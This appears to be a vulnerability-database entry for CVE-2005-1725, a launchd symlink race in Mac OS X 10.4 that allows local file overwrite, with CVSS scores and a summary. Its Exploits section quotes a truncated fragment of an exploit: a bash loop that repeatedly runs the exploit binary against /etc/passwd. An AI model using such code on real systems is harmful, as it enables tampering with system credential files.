2.1
CVSSv2

CVE-2005-1725

Published: 08/06/2005 Updated: 18/10/2016
CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9
VMScore: 215
Vector: AV:L/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

launchd 106 in Apple Mac OS X 10.4.x up to 10.4.1 allows local users to overwrite arbitrary files via a symlink attack on the socket file in an insecure temporary directory.

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x server 10.4

apple mac os x server 10.4.1

Exploits

/* * Mac OS X 104 launchd race condition exploit * * intropy (intropy <at> caughqorg) */ /* sh script to help with the offsets /str0ke #!/bin/bash X=1000 Y=3000 I=1 while ((1)) do /CAU-launchd /etc/passwd $X if [ $I -lt 30 ] then ((X=$X+$Y)) ((I=$I+1)) else X=1000 I=1 fi done */ ...